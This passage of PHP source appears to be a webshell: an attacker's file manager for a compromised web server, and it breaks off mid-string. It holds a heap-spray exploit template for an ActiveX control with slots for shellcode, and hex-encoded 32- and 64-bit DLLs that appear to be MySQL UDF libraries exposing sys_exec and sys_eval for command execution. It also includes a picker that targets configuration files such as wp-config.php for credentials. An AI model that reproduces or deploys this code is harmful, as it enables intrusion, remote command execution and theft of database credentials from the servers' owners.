"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".\r\n    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/".\r\n    "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b".\r\n    "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC".\r\n    "aNOmRcjVj02tPxPCzfkvIAA7"\r\n\t);\r\n  header(\'Content-type: image/gif\');\r\n  echo base64_decode($images[$img]);\r\n  die();\r\n}\r\n\r\nfunction css_showimg($file){\r\n\t$it=substr($file,-3);\r\n\tswitch($it){\r\n\t\tcase "jpg": case "gif": case "bmp": case "png": case "ico": return \'img\';break;\r\n\t\tcase "htm": case "tml": return \'html\';break;\r\n\t\tcase "exe": case "com": return \'exe\';break;\r\n\t\tcase "xml": case "doc": return \'xml\';break;\r\n\t\tcase ".js": case "vbs": return \'js\';break;\r\n\t\tcase "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi":case "mp4":case "mvb": return \'mp3\';break;\r\n\t\tcase "rar": case "tar": case ".gz": case "zip":case "iso": return \'rar\';break;\r\n  \tdefault: return \'txt\';break;\r\n\t}\r\n}\r\n\r\nfunction css_js($num,$code = \'\'){\r\n\tif($num == "shellcode"){\r\n\t\treturn \'<%@ LANGUAGE="JavaScript" %>\r\n\t\t<%\r\n\t\tvar act=new ActiveXObject("HanGamePluginCn18.HanGamePluginCn18.1");\r\n\t\tvar shellcode = unescape("\'.$code.\'");\r\n\t\tvar bigblock = unescape("%u9090%u9090");\r\n\t\tvar headersize = 20;\r\n\t\tvar slackspace = headersize+shellcode.length;\r\n\t\twhile (bigblock.length<slackspace) bigblock+=bigblock;\r\n\t\tfillblock = bigblock.substring(0, slackspace);\r\n\t\tblock = bigblock.substring(0, bigblock.length-slackspace);\r\n\t\twhile(block.length+slackspace<0x40000) block = block+block+fillblock;\r\n\t\tmemory = new Array();\r\n\t\tfor (x=0; x<300; x++) memory[x] = block + shellcode;\r\n\t\tvar buffer = "";\r\n\t\twhile (buffer.length < 1319) buffer+="A";\r\n\t\tbuffer=buffer+"\\x0a\\x0a\\x0a\\x0a"+buffer;\r\n\t\tact.hgs_startNotify(buffer);\r\n\t\t%>\';\r\n\t}\r\n\thtml_n(\'<script language="javascript">\');\r\n\tif($num == "1"){\r\n\thtml_n(\'\tfunction rusurechk(msg,url){\r\n\t\tsmsg = "FileName:[" + msg + "]\\nPlease Input New File:";\r\n\t\tre = prompt(smsg,msg);\r\n\t\tif (re){\r\n\t\t\turl = url + re;\r\n\t\t\twindow.location = url;\r\n\t\t}\r\n\t}\r\n\tfunction rusuredel(msg,url){\r\n\t\tsmsg = "Do You Suer Delete [" + msg + "] ?";\r\n\t\tif(confirm(smsg)){\r\n\t\t\tURL = url + msg;\r\n\t\t\twindow.location = url;\r\n\t\t} \r\n\t}\r\n\tfunction Delok(msg,gourl)\r\n\t{\r\n\t\tsmsg = "ȷҪɾ[" + unescape(msg) + "]?";\r\n\t\tif(confirm(smsg))\r\n\t\t{\r\n\t\t\tif(gourl == \\\'b\\\')\r\n\t\t\t{\r\n\t\t\t\tdocument.getElementById(\\\'actall\\\').value = escape(gourl);\r\n\t\t\t\tdocument.getElementById(\\\'fileall\\\').submit();\r\n\t\t\t}\r\n\t\t\telse window.location = gourl;\r\n\t\t}\r\n\t}\r\n\tfunction CheckAll(form)\r\n\t{\r\n\t\tfor(var i=0;i<form.elements.length;i++)\r\n\t\t{\r\n\t\t\tvar e = form.elements[i];\r\n\t\t\tif (e.name != \\\'chkall\\\')\r\n\t\t\te.checked = form.chkall.checked;\r\n\t\t}\r\n\t}\r\n\tfunction CheckDate(msg,gourl)\r\n\t{\r\n\t\tsmsg = "ǰļʱ:[" + msg + "]";\r\n\t\tre = prompt(smsg,msg);\r\n\t\tif(re)\r\n\t\t{\r\n\t\t\tvar url = gourl + re;\r\n\t\t\tvar reg = /^(\\\\d{1,4})(-|\\\\/)(\\\\d{1,2})\\\\2(\\\\d{1,2}) (\\\\d{1,2}):(\\\\d{1,2}):(\\\\d{1,2})$/; \r\n\t\t\tvar r = re.match(reg);\r\n\t\t\tif(r==null){alert(\\\'ڸʽȷ!ʽ:yyyy-mm-dd hh:mm:ss\\\');return false;}\r\n\t\t\telse{document.getElementById(\\\'actall\\\').value = gourl; document.getElementById(\\\'inver\\\').value = re; document.getElementById(\\\'fileall\\\').submit();}\r\n\t\t}\r\n\t}\r\n\tfunction SubmitUrl(msg,txt,actid)\r\n\t{\r\n\t\tre = prompt(msg,unescape(txt));\r\n\t\tif(re)\r\n\t\t{\r\n\t\t\tdocument.getElementById(\\\'actall\\\').value = actid;\r\n\t\t\tdocument.getElementById(\\\'inver\\\').value = escape(re);\r\n\t\t\tdocument.getElementById(\\\'fileall\\\').submit();\r\n\t\t}\r\n\t}\');\r\n\t}elseif($num == "2"){\r\n\thtml_n(\'var NS4 = (document.layers);\r\nvar IE4 = (document.all);\r\nvar win = this;\r\nvar n = 0;\r\nfunction search(str){\r\n\tvar txt, i, found;\r\n\tif(str == "")return false;\r\n\tif(NS4){\r\n\t\tif(!win.find(str)) while(win.find(str, false, true)) n++; else n++;\r\n\t\tif(n == 0) alert(str + " ... Not-Find")\r\n\t}\r\n\tif(IE4){\r\n\t\ttxt = win.document.body.createTextRange();\r\n\t\tfor(i = 0; i <= n && (found = txt.findText(str)) != false; i++){\r\n\t\t\ttxt.moveStart("character", 1);\r\n\t\t\ttxt.moveEnd("textedit")\r\n\t\t}\r\n\t\tif(found){txt.moveStart("character", -1);txt.findText(str);txt.select();txt.scrollIntoView();n++}\r\n\t\telse{if (n > 0){n = 0;search(str)}else alert(str + "... Not-Find")}\r\n\t}\r\n\treturn false\r\n}\r\nfunction CheckDate(){\r\n\tvar re = document.getElementById(\\\'mtime\\\').value;\r\n\tvar reg = /^(\\\\d{1,4})(-|\\\\/)(\\\\d{1,2})\\\\2(\\\\d{1,2}) (\\\\d{1,2}):(\\\\d{1,2}):(\\\\d{1,2})$/; \r\n\tvar r = re.match(reg);\r\n\tvar t = document.getElementById(\\\'charset\\\').value;\r\n    t = t.toLowerCase();\r\n\tif(r==null){alert(\\\'ڸʽȷ!ʽ:yyyy-mm-dd hh:mm:ss\\\');return false;}\r\n\telse{document.getElementById(\\\'newfile\\\').value = base64encode(document.getElementById(\\\'newfile\\\').value);\r\n\tif(t=="utf-8"){document.getElementById(\\\'txt\\\').value = base64encode(utf16to8(document.getElementById(\\\'txt\\\').value));}\r\n\');\r\nif (substr(PHP_VERSION,0,1)>=5){html_n(\'if(t=="gbk" || t=="gb2312"){document.getElementById(\\\'txt\\\').value = base64encode(utf16to8(document.getElementById(\\\'txt\\\').value));}\');}\r\nhtml_n(\'\r\n\tdocument.getElementById(\\\'editor\\\').submit();}\r\n}\');\r\n}elseif($num == "3"){\r\n\thtml_n(\'function Full(i){\r\n   if(i==0 || i==5){\r\n     return false;\r\n   }\r\n  Str = new Array(12);  \r\n\tStr[1] = "Provider=Microsoft.Jet.OLEDB.4.0;Data Source=\\db.mdb";\r\n\tStr[2] = "Driver={Sql Server};Server=,1433;Database=DbName;Uid=sa;Pwd=****";\r\n\tStr[3] = "Driver={MySql};Server=;Port=3306;Database=DbName;Uid=root;Pwd=****";\r\n\tStr[4] = "Provider=MSDAORA.1;Password=;User ID=ʺ;Data Source=;Persist Security Info=True;";\r\n\tStr[6] = "SELECT * FROM [TableName] WHERE ID<100";\r\n\tStr[7] = "INSERT INTO [TableName](USER,PASS) VALUES(\\\'eanver\\\',\\\'mypass\\\')";\r\n\tStr[8] = "DELETE FROM [TableName] WHERE ID=100";\r\n\tStr[9] = "UPDATE [TableName] SET USER=\\\'eanver\\\' WHERE ID=100";\r\n\tStr[10] = "CREATE TABLE [TableName](ID INT IDENTITY (1,1) NOT NULL,USER VARCHAR(50))";\r\n\tStr[11] = "DROP TABLE [TableName]";\r\n\tStr[12] = "ALTER TABLE [TableName] ADD COLUMN PASS VARCHAR(32)";\r\n\tStr[13] = "ALTER TABLE [TableName] DROP COLUMN PASS";\r\n\tif(i<=4){\r\n\t  DbForm.string.value = Str[i];\r\n  }else{\r\n  \tDbForm.sql.value = Str[i];\r\n  }\r\n  return true;\r\n  }\');\r\n}\r\nelseif($num == "4"){\r\n\thtml_n(\'function Fulll(i){\r\n   if(i==0){\r\n     return false;\r\n   }\r\n  Str = new Array(8);  \r\n\tStr[1] = "config.inc.php";\r\n\tStr[2] = "config.inc.php";\r\n\tStr[3] = "config_base.php";\r\n\tStr[4] = "config.inc.php";\r\n\tStr[5] = "config.php";\r\n\tStr[6] = "wp-config.php";\r\n\tStr[7] = "config.php";\r\n\tStr[8] = "mysql.php";\r\n\tsform.code.value = Str[i];\r\n  return true;\r\n  }\');\r\n}\r\nhtml_n(\'</script>\');\r\n}\r\n\r\nfunction css_left(){\r\n\thtml_n(\'<style type="text/css">\r\n\t.menu{width:152px;margin-left:auto;margin-right:auto;}\r\n\t.menu dl{margin-top:2px;}\r\n\t.menu dl dt{top left repeat-x;}\r\n\t.menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold;\r\n\ttext-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;}\r\n\t.menu dl dt a:hover{color:#FFFFCC;}\r\n\t.menu dl dd ul{list-style:none;}\r\n\t.menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px;\r\n\tbackground:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF;\r\n\tborder-style:solid;border-width:1px;}\r\n\t.menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;}\r\n\t</STYLE>\');\r\n\thtml_n(\'<script language="javascript">\r\n\tfunction getObject(objectId){\r\n\t if(document.getElementById && document.getElementById(objectId)) {\r\n\t return document.getElementById(objectId);\r\n\t }\r\n\t else if (document.all && document.all(objectId)) {\r\n\t return document.all(objectId);\r\n\t }\r\n\t else if (document.layers && document.layers[objectId]) {\r\n\t return document.layers[objectId];\r\n\t }\r\n\t else {\r\n\t return false;\r\n\t }\r\n\t}\r\n\tfunction showHide(objname){\r\n\t  var obj = getObject(objname);\r\n\t    if(obj.style.display == "none"){\r\n\t\t\tobj.style.display = "block";\r\n\t\t}else{\r\n\t\t\tobj.style.display = "none";\r\n\t\t}\r\n\t}\r\n\t</script><div class="menu">\');\r\n}\r\n\r\nfunction css_main(){\r\n\thtml_n(\'<style type="text/css">\r\n\t*{padding:0px;margin:0px;}\r\n\tbody,td{font-size: 12px;color:#00ff00;background:#292929;}input,select,textarea{font-size: 12px;background-color:#FFFFCC;border:1px solid #fff}\r\n\tbody{color:#FFFFFF;font-family:Verdana, Arial, Helvetica, sans-serif;\r\n\theight:100%;overflow-y:auto;background:#333333;SCROLLBAR-FACE-COLOR: #232323; SCROLLBAR-HIGHLIGHT-COLOR: #232323; SCROLLBAR-SHADOW-COLOR: #383838; SCROLLBAR-DARKSHADOW-COLOR: #383838; SCROLLBAR-3DLIGHT-COLOR: #232323; SCROLLBAR-ARROW-COLOR: #FFFFFF;SCROLLBAR-TRACK-COLOR: #383838;}\r\n\tinput,select,textarea{background-color:#FFFFCC;border:1px solid #FFFFFF}\r\n    a{color:#ddd;text-decoration: none;}a:hover{color:red;background:#000}\r\n\t.actall{background:#000000;font-size:14px;border:1px solid #999999;padding:2px;margin-top:3px;margin-bottom:3px;clear:both;}\r\n\t</STYLE><body style="table-layout:fixed; word-break:break-all; FILTER: progid:DXImageTransform.Microsoft.Gradient(gradientType=0,startColorStr=#626262,endColorStr=#1C1C1C)">\r\n\t<table width="85%" border=0 bgcolor="#555555" align="center">\');\r\n}\r\n\r\nfunction css_foot(){\r\n\thtml_n(\'</td></tr></table>\');\r\n}\r\n\r\nfunction Mysql_shellcode()\r\n{\r\n\treturn "0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000E80000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A2400000000000000F2950208B6F46C5BB6F46C5BB6F46C5B9132175BB4F46C5B9132115BB7F46C5B9132025BB4F46C5B9132015BBBF46C5B75FB315BB5F46C5BB6F46D5B9AF46C5B91321D5BB7F46C5B9132165BB7F46C5B9132145BB7F46C5B52696368B6F46C5B0000000000000000504500004C0103004E10A34D0000000000000000E00002210B010800001000000010000000600000D07B0000007000000080000000000010001000000002000004000000000000000400000000000000009000000010000000000000020000000000100000100000000010000010000000000000100000007882000008020000B0810000C800000000800000B001000000000000000000000000000000000000808400001000000000000000000000000000000000000000000000000000000000000000000000009C7D00004800000000000000000000000000000000000000000000000000000000000000000000000000000000000000555058300000000000600000001000000000000000040000000000000000000000000000800000E055505831000000000010000000700000000E000000040000000000000000000000000000400000E02E7273726300000000100000008000000006000000120000000000000000000000000000400000C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000332E303500555058210D09020947A37B47FAE6101946550000C90B000000200000260000A4FFFFFFFF8B4C240833C03901741656578B7C24146A0C59BE000010DCF3A566A55FB0015EAEFDBBFDC3C38B44240C1B6A071711108BF81933FFDFEDB7181DA45FC7011E12005E210883380175128B40040DF6776F0700750A1004C6000132C0C3540A6F2FF68D3C3054A455322D08FF30BFBDFBDDFF156D8885C05975085614C601011BC8568D7101FFDBB7FF8A114184D275F98B54142BCE890A32558BEC8B4D0C8339022D36D86F5374148B7D10915C54536F67EFF7EB4C8B417D740F1B707C1BEBE58366ECFFED6004001A0C8B48048B008D4401025072A037F2DD6E4E08891875113006A44CDD96EFEDEBB2B85F5E5DA3040C287408DBF6C79E33A8591353568B742410D8785346BB707B6B02B6460851C78D5C4357E824CEDDFD770AB81400C604070008FF70041E05767B43B2531A22C4185357200300544126E136086A995B420B7E780A84033B9859991A83EC0CFB5BFBEB9735D9576800F15CD66A018945FC06BB75DD7F8BF08B450CC60600326848C03733FF396DEDEF1E9C8B1D0590506A04FF75FC2AACD37D2EBCBD991CEB402DFC8D487E10402BC1B68D6DBF18F803C7505606F4348C2BF851BBB5B1BB3003FE5710940BD47DF44463EEC21741202F75BC131CA40B03FBFF803E0059741A8BC6C64437FF00567B14DF3AB68589B3066C18285F205E5BC9C3D6B6AE73F3C951F77D5247E3306DDB2CCB5008C9C26A98F0BF1726B4B710548D4601B23B5C4F08EDDB09EE56FF31BBA0947E0C6AFF8DC082B55D7B2082EE02F8092C0FDBC6C123005FEE5E6B6A0C125E58F886909609848365FC1D4550D0EB075BD85ED81B405F65E8C742FE24FF0D0BDB855F1FC9C24E3B0D08209602DBCEFEEDF3C3E908065556688000005680965608B8BFCB1F8485F65959A32354045075054BFEED762FAC8326004308166D083E0904C70424FF098FDD06075D0B5933C0CF5533ED3BC5750EDD7F85DD392D66107E2B6E1083F8018B0810DD7D77E1548B09DB57890A23440F85CC7964A118771C61C3058104C2385521234CEB0DF6DFB5184D9D051A3BC7741768E803A03CEE76C3B6FF57A1D396E7EB036645A12BB7FBFBB7480D6A025F74096A1FE056EB3C9E10C80460FADCF7C0C7051F015E1A50267FDF77B6C007581720BC04B81B4A5989F784A6B13D4BEDBC5504408312C97DEFD258851E6807E4DE4294BBBD7769FF321C57042618FF05E0BD6F6BDF5414F7D38ECD3DCAB6C6809DC90BBE55C75BD783BD10EBBEEBB91402740AB759BE8D1DB6EB4835713B78258BD885DBB8B410DB6C3414EED7E1F8EBF45F68DA4607C102DC83EF043BFB73F1530811C682CA067CAAB4307B1B8525E32D60C77C6C7CC9BC985B5DC20C3E1029286FB86F8D8B8FF28B5D081C73E433C9F04DBBD2894D376A2008683BF1751039FFC75688B60C17E426103BF0740583FE5BA1F5EE02752EB910D03BC148897FD0DB39F7773B837DE4000F8493F6115A037F147D27D99AA71280096227FEAC9DDD6D1324FB2057501357A72F8DF6BAD852D90611537C67BB617F6A0375434F34032168746D3CECB02E2C257FEB1BF0ECA3F0BD75BB09AAE05051595CE7F9413AB5D20B2F0F013D46DA761906292AE407C31B6D5B8DAEEC16FFD79A089A052CD0307CD600D688BC109B0C770DAB0C10051E5936C981ECE18F0D8628C55D2120BC211C895A3F3EECB8211889B3211438211041210C7DED6BDF668C183806252C062008A9344BB306050425001A6C63EDFBFC9C8F14309156240704ACFDB7F428F20807348B85E0FC9CA6B67B5B6370C201A11C19202413778E513A1809C9E0201C1DB37CEE25D38985D8320A04DC7E8D6F04FF24346879DF945963EC63B04128FAD40A2CE7BDC3B6DA20110823685B9E0A678D1B3068342F033C887C5CF81E9A5B6A144650C0C391C1B435D659E7F85A1B63ED324D3970D7619FB8363BFC37AC598B2E2827ADD0BA60D90AE0F3B903B16DFBDCE450352AA612DC0AE45440DB626C60D6D30FE009859710C3D4E5D107FB371DDAD984DCD166A09EC3BB0E6EFF1A65F7D81BC00359487EB8B018BF2DB1D57A0451E5735806B0D2CB2049C6F772F11F23C28E90672020CC00D0FA054727D281394D5A748BA1F09728EE973C03C1813850CE4936F85B69F04F1878180B010F941DC1FC3612C336844825C80FB74114121BDF0A0505710633D2EC57C9FABF9DF80818761E201D0C3BF972098B580803D9D4FEB758E07221C20183C0283BD672E660619241C0C2E970BA0330D0FD7AF00052996C59AB3DF94B7CC7365D50109C59112B29244F07E1F6C1E81FF7C3E00134EB202E00C1AC636B01A33D3EC0A2B11D85942845AB105805E3A491914C50AC2D13348483A1D287206DEADC35936B204A2CE7A309E1646DA91938DE09F3186C036D0C039B8D2BE0FAA8316AC1DA89F633C5508973810B796DEF0D139E04F064A337904DC3BBDBA9096900595FFA8BE55D51D8C3BB1BD810036803276850F9C4CEC2C5B28C3E1064F82D222D20F8FEA0BF4EE640BB1ABC1958D3BB86360D85C32C33B63F15101404EB605671F8E3C61E6BED448B75948E0B1033F00714EDCC95411899271CB0E0BED1DAF4330C11137507BE4F59C02FD12EE285F30AF7C1E0100BF006E1638F4400F7D607045E5F5B495C464646C6056064686C0064474674B00000472FEC0003360F201801FF7FFBFF4E6F20617267756D656E7473096C6C6F77656420287564663A206CDCDF76FF69625F6D7973716C0D5F73085F696E666F29396DFBFFC8182076657273696F6E20302E01341FBFBDDDFD45787065637447657861076C79201A6520737472B5ADB56F3F672074791B7572617105EC00B621722B747791FD36B0801F3F8672206E616D1D7BFB8148436F756C246E6F74C463618375DBB61320186D2779AF72F148A9DD44093F2003121013DF8B05F6E119216B07D0D6D5B0200F1F2D07293BAC7B05F90B0D17CC27DD099BB0070FD81F0928033C92E85E611F030F0313E944D9000000EC1B6814E5B119BF44FF00515565110FC9A8AAB200AA645455555532AA8EA22A195C03E07FFB0410020157616974466F725388BF35007E6C654F626A99145669727475FB9B03E0616C41760D536574456E7612B6DF01706F6EC05661726961622B41753700DE184372659454680664FBADFBB60D47264375727222502A636573734914F0C1660926135469636BDB7EB701DE6E6B5175657279500366840D80587B6D616E3716FDF6F6B3F70144697367374C6962727879436192B6D6FEDB731A4973446562756767266A6865DBDB76F746A4556E684064316445784670ADB0D8DB7469AF46696C4A1957D8B694B41254176D0DD86B0D6F321149900A6B409DB9E6DC766D70876547517F77B72C61AD5551221B5C7517DA76537973186DEE3941737365EDA161E10975697C4C7D5F686FDFED0A7E396D5F2E5F616D7367087869740BD86F7F0B646A753A5F66646976260ADC0F76A1639A5F64FD5F686F6F6B13B800B6D61459725F4875017C01D15F49735EC16DCE0A330A6C21539C82056BF82A64D46E64133D6184C90F651E5F2C72346BCDB5AD56ED6D1C18700A036EDF177B5F706F52296E106468756CC9DEA3F05EB92A9B1B6CB7B5652CA8066EC5726525BD6D705B0866115673749C637079AE3517C108243932C06EADE1F6664D0FD76F7319663A1DC2F60F1F5F437070583174BC6DFFFF63AF343F0018183D193C1C1B161E552719111F0A062FFFFFFFFF111D5F10130A070D2E15090905140C1B08090B150618141505061B050C0D0608FDDBBFFD190613050D0F120F1D07050509062E0D18532D483406B7DB72F20007080C3B060A390C05DF6E6FB710070616120E0B06420B215637051F05776FB7EE9F0E5D2C0D001D4C61230D0C2E24080B97FFB7634106F0021004F02C01043808041C1C040090FE1D05ED4C0105004E10A34D867E93B6FFE00002210B0108080C8E003816B6B1B1C10B200E100B020204FEEC61C1330700600C4B070100023C1BD8C12A00100706C026DFB62B04A420AC22033C1440EB0D60750B0113509F3AB72CF62AC8214200A7BB0B0359B82F2EAB787407C20A271BD860900CC442602E61B0DBD27264746108C508FB0A139AED862D0077402E26943DA1DBC20304301B001A27061BECDBC04F73726300EB40271CF8A311C04F5C6D009A01DF948C4D03271E421BA000B463B72303D152127353030000000000000012FF00000000000000807C2408010F85B901000060BE007000108DBE00A0FFFF5783CDFFEB0D9090908A064688074701DB75078B1E83EEFC11DB72EDB80100000001DB75078B1E83EEFC11DB11C001DB73EF75098B1E83EEFC11DB73E431C983E803720DC1E0088A064683F0FF747489C501DB75078B1E83EEFC11DB11C901DB75078B1E83EEFC11DB11C975204101DB75078B1E83EEFC11DB11C901DB73EF75098B1E83EEFC11DB73E483C10281FD00F3FFFF83D1018D142F83FDFC760F8A02428807474975F7E963FFFFFF908B0283C204890783C70483E90477F101CFE94CFFFFFF5E89F7B92B0000008A07472CE83C0177F7803F0075F28B078A5F0466C1E808C1C01086C429F880EBE801F0890783C70588D8E2D98DBE005000008B0709C0743C8B5F048D8430B071000001F35083C708FF96EC710000958A074708C074DC89F95748F2AE55FF96F071000009C07407890383C304EBE16131C0C20C0083C7048D5EFC31C08A074709C074223CEF771101C38B0386C4C1C01086C401F08903EBE2240FC1E010668B0783C702EBE28BAEF47100008DBE00F0FFFFBB0010000050546A045357FFD58D870702000080207F8060287F585054505357FFD558618D4424806A0039C475FA83EC80E99F98FFFF000000480000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003000101022001001000000000000000000000000000000000000000000000000000000000000000000000000000000040000000000010018000000180000800000000000000000040000000000010002000000300000800000000000000000040000000000010009040000480000005C80000052010000E404000000000000584000003C617373656D626C7920786D6C6E733D2275726E3A736368656D61732D6D6963726F736F66742D636F6D3A61736D2E763122206D616E696665737456657273696F6E3D22312E30223E0D0A20203C646570656E64656E63793E0D0A202020203C646570656E64656E74417373656D626C793E0D0A2020202020203C617373656D626C794964656E7469747920747970653D2277696E333222206E616D653D224D6963726F736F66742E564338302E435254222076657273696F6E3D22382E302E35303630382E30222070726F636573736F724172636869746563747572653D2278383622207075626C69634B6579546F6B656E3D2231666338623362396131653138653362223E3C2F617373656D626C794964656E746974793E0D0A202020203C2F646570656E64656E74417373656D626C793E0D0A20203C2F646570656E64656E63793E0D0A3C2F617373656D626C793E50410000000000000000000000000C820000EC810000000000000000000000000000198200000482000000000000000000000000000000000000000000002482000032820000428200005282000060820000000000006E820000000000004B45524E454C33322E444C4C004D5356435238302E646C6C00004C6F61644C69627261727941000047657450726F634164647265737300005669727475616C50726F7465637400005669727475616C416C6C6F6300005669727475616C467265650000006672656500000000000000004D10A34D0000000054830000010000001200000012000000A0820000E8820000308300002210000021100000001000008F120000211000008C120000C51100002110000087110000B311000021100000871100007710000021100000441000002F1100001B110000AA100000698300007F8300009C830000B7830000C3830000D6830000E7830000F0830000008400000E8400001784000027840000358400003D8400004C84000059840000618400007084000000000100020003000400050006000700080009000A000B000C000D000E000F00100011006C69625F6D7973716C7564665F7379732E646C6C006C69625F6D7973716C7564665F7379735F696E666F006C69625F6D7973716C7564665F7379735F696E666F5F6465696E6974006C69625F6D7973716C7564665F7379735F696E666F5F696E6974007379735F62696E6576616C007379735F62696E6576616C5F6465696E6974007379735F62696E6576616C5F696E6974007379735F6576616C007379735F6576616C5F6465696E6974007379735F6576616C5F696E6974007379735F65786563007379735F657865635F6465696E6974007379735F657865635F696E6974007379735F676574007379735F6765745F6465696E6974007379735F6765745F696E6974007379735F736574007379735F7365745F6465696E6974007379735F7365745F696E6974000000000070000010000000DD3BD83DDC3D00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";\r\n}\r\nfunction Mysql_shellcode64()\r\n{\r\n\treturn \t"0x4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616E6E6F742062652072756E20696E20444F53206D6F64652E0D0D0A240000000000000033C2EDE077A383B377A383B377A383B369F110B375A383B369F100B37DA383B369F107B375A383B35065F8B374A383B377A382B35BA383B369F10AB376A383B369F116B375A383B369F111B376A383B369F112B376A383B35269636877A383B300000000000000000000000000000000504500006486060070B1834B0000000000000000F00022200B020900001200000016000000000000341A0000001000000000008001000000001000000002000005000200000000000500020000000000008000000004000033CE000002004001000010000000000000100000000000000000100000000000001000000000000000000000100000000039000005020000403400003C00000000600000B002000000500000680100000000000000000000007000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300000700100000000000000000000000000000000000000000000000000002E7465787400000011100000001000000012000000040000000000000000000000000000200000602E72646174610000050B000000300000000C000000160000000000000000000000000000400000402E64617461000000D8050000004000000002000000220000000000000000000000000000400000C02E7064617461000068010000005000000002000000240000000000000000000000000000400000402E72737263000000B0020000006000000004000000260000000000000000000000000000400000402E72656C6F630000240000000070000000020000002A00000000000000000000000000004000004200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000833A007450488B05A4210000498900488B05A221000049894008488B059F21000049894010488B059C21000049894018488B059921000049894020488B0596210000498940280FB705932100006641894030B001C332C0C3CCCCCCCCCCCCCCCC488B0581210000498900488B057F21000049894008488B057C210000498940108B057A210000418940180FB70573210000664189401C0FB605692100004188401E41C7011E000000498BC0C3CCCCCCCC833A01750F488B42088338007506C6010132C0C3488B053D210000498900488B053B21000049894008488B053821000049894010488B053521000049894018488B0532210000498940200FB7052F21000066418940280FB605252100004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCC40534883EC20488B4A10498BD9488B09FF15DA1F00004C8BD84885C0750E488B4C2450C601014883C4205BC348897C243033C04883C9FF498BFBF2AE488B7C2430498BC348F7D148FFC9890B4883C4205BC3CCCCCCCCCCCCCCCCCCCCCCCCCCCC48895C2408574883EC20833A02498BD8488BF97455488D0D64EEFFFF488B8138320000498900488B814032000049894008488B8148320000498940108B8150320000418940180FB78154320000664189401C0FB681563200004188401EB001488B5C24304883C4205FC3488B4208833800744A488D0D06EEFFFF488B8158320000498900488B816032000049894008488B816832000049894010488B817032000049894018488B817832000049894020B001488B5C24304883C4205FC3C7400400000000488B42188B48048B008D4C0102FF15E91E0000488947104885C0753F488D0D99EDFFFF488B8180320000488903488B818832000048894308488B8190320000488943100FB7819832000066894318B001488B5C24304883C4205FC332C0488B5C24304883C4205FC3CCCCCCCC4883EC28488B49104885C97406FF158D1E00004883C428C3CCCCCCCCCCCCCCCC48895C24084889742410574883EC20488B4218488B7110488BFA488B5210448B00488BCE488B12498D5C3001E8750C00004C8B5F18488BCB418B03C6043000488B4718488B5710448B4004488B5208E8520C00004C8B5F18488BD3418B4304488BCEC6041800FF15D41C0000488B5C2430488B74243848984883C4205FC3CCCC833A01750C488B4208833800750332C0C3488B05A01E0000498900488B059E1E000049894008488B059B1E000049894010488B05981E000049894018488B05951E0000498940200FB705921E000066418940280FB605881E00004188402AB001C3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC4883EC28488B4A10488B09FF155F1D000048984883C428C3CCCCCCCCCCCCCCCC4056574154415541564881EC30040000488B05092C00004833C448898424200400004C8BAC2480040000B9010000004889AC24700400004D8BF1488BFAFF151D1D0000488B4F10488D156E1E00004533E4488B09488BF0FF15FB1C0000488D4C2420BA000400004C8BC0488BE8FF15CD1C00004885C0746648899C24600400004883C9FF33C0488D7C2420F2AE48F7D1428D5C21FF488D79FF488BCE8BD3FF15941C0000418BCC488D5424204803C8448BC7488BF0FF158D1C0000488D4C24204C8BC5BA00040000448BE3FF156F1C00004885C075AA488B9C2460040000488BCDFF15811C0000803E00488BAC2470040000741F4883C9FF418D4424FF488BFEC604300033C0F2AE48F7D148FFC941890EEB0541C6450001488BC6488B8C24200400004833CCE8150100004881C430040000415E415D415C5F5EC3CCCCCCCCCC32C0C3CCCCCCCCCCCCCCCCCCCCCCCCCCC20000CCCCCCCCCCCCCCCCCCCCCCCCCC48895C24084889742418574883EC30488B7A104883C9FF33C0488B3F488BF2448D4840F2AE41